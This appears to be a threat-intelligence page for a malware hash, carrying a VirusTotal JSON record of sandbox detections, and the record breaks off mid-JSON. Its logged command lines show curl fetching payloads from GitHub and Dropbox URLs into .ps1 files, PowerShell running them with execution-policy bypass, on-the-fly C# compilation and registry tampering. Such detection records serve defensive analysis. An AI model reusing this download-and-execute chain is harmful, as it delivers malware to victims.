d9d7d5feb2abc828b58142fc63509d80
Hash
- MD5: d9d7d5feb2abc828b58142fc63509d80
- SHA1: 77b21660041e26464e94e737babb43ebe95b91f1
- SHA256: 7ed250363d5c2714a79e826cef1690ed155bbc0500b67a7344db61fc7a03ed48
- First Seen: 2026-05-13
- Last Seen: 2026-05-13
- Related Reports: 1
- Related IOCs: 0
Additional Information
VirusTotal
{
"data": {
"id": "7ed250363d5c2714a79e826cef1690ed155bbc0500b67a7344db61fc7a03ed48",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/7ed250363d5c2714a79e826cef1690ed155bbc0500b67a7344db61fc7a03ed48"
},
"attributes": {
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "09fa8f2c3e86f0fa6cc0876e94d77a20c07409a7154a61ef64a9a9a31a6d0049",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious File Download From File Sharing Domain Via Curl.EXE",
"rule_description": "Detects potentially suspicious file download from file sharing domains using curl.exe",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "1929e853315b3b5398e0837b2b8928a28ae8eec0611ebb41efc5e6b33e78cd6c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Parameter Substring",
"rule_description": "Detects suspicious PowerShell invocation with a parameter substring",
"rule_author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "76e8bb8877ab40bd84b14fc93daffe9ff7ebe9440ce09916b5c63a302d62c918",
"rule_source": "Joe Security Rule Set (GitHub)",
"rule_title": "Dot net compiler compiles file from suspicious location",
"rule_description": "Dot net compiler compiles file from suspicious location",
"rule_author": "Joe Security",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=EB80BB1CA9B9C7F516FF69AFCFD75B7D,SHA256=38C407DBF41E99396B78D00DD796930D8838DCB4AF77C3F23BA0E800D1213EBE,IMPHASH=950FB6F62526333E663D35BA72D19DDC",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\pz2o5amr\\pz2o5amr.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "8d980d509aaf7ca8f2c6cd9dd23e8ea6eb18328ca64711cb6e059ecec024fe0a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Outbound Network Connection Initiated By Script Interpreter",
"rule_description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.",
"rule_author": "frack113, Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"Initiated": "true",
"Protocol": "tcp",
"SourceIp": "192.168.122.104",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\System32\\WScript.exe",
"SourcePort": "49685",
"DestinationIp": "185.199.111.133"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"DestinationIp": "185.199.108.133",
"Protocol": "tcp",
"SourceIp": "172.16.1.3",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "55798",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "80",
"Initiated": "true",
"Protocol": "tcp",
"SourceIp": "172.16.1.3",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "55799",
"DestinationIp": "104.18.21.213"
}
}
]
},
{
"rule_level": "high",
"rule_id": "b0e07fc365ce0d0690c84a20e3467a5be2301d1c4de1e87bcbb9cb9ea841222c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Csc.EXE Execution Form Potentially Suspicious Parent",
"rule_description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=EB80BB1CA9B9C7F516FF69AFCFD75B7D,SHA256=38C407DBF41E99396B78D00DD796930D8838DCB4AF77C3F23BA0E800D1213EBE,IMPHASH=950FB6F62526333E663D35BA72D19DDC",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\pz2o5amr\\pz2o5amr.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "d86dfee683d0e96803dc8a153d15f7208afc774045e2d885ccaec10bdcef7831",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Curl.EXE Download",
"rule_description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "1429a6819ff25aad68fb09601fb0b63c4be24919adfd25c4ad925ef8d47d8f22",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "WmiPrvSE Spawned A Process",
"rule_description": "Detects WmiPrvSE spawning a process",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"ScriptBlockId": "c7cc4a3a-1524-4be2-8795-14dbaca6cb36",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "77ecce5ea77940e3b7b82f2766d696c4bf16f75a458c3ddfe650f26d4475fa74",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Insecure Transfer Via Curl.EXE",
"rule_description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "884b7e21f67a56fc9cb312bdbc27e658c101c449662b2f9e25fd463a75715971",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Registry Tampering by Potentially Suspicious Processes",
"rule_description": "Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\nThese processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\nwithout using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"EventType": "SetValue",
"Details": "DWORD (0x00000001)",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass"
}
},
{
"values": {
"Details": "DWORD (0x00000001)",
"EventType": "SetValue",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
}
},
{
"values": {
"Details": "DWORD (0x00000001)",
"EventID": "13",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet"
}
},
{
"values": {
"EventType": "SetValue",
"EventID": "13",
"Image": "C:\\Windows\\System32\\WScript.exe",
"Details": "DWORD (0x00000000)",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
}
},
{
"values": {
"EventID": "13",
"Details": "(Empty)",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "a5f575ade1f2aaba452086d3418d8a893e94b28e30da42ad98b58df4a4fe9c2d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Suspicious PowerShell Keywords",
"rule_description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"rule_author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"ScriptBlockId": "c7cc4a3a-1524-4be2-8795-14dbaca6cb36",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "b39586c79bf4d0d43c937efa6129ebb6f0b2cf03b7038a3a8234f84c147600f7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic .NET Compilation Via Csc.EXE",
"rule_description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.",
"rule_author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=EB80BB1CA9B9C7F516FF69AFCFD75B7D,SHA256=38C407DBF41E99396B78D00DD796930D8838DCB4AF77C3F23BA0E800D1213EBE,IMPHASH=950FB6F62526333E663D35BA72D19DDC",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "csc.exe",
"Product": "Microsoft\\xae .NET Framework",
"Description": "Visual C# Command Line Compiler",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentCommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\pz2o5amr\\pz2o5amr.cmdline\"",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
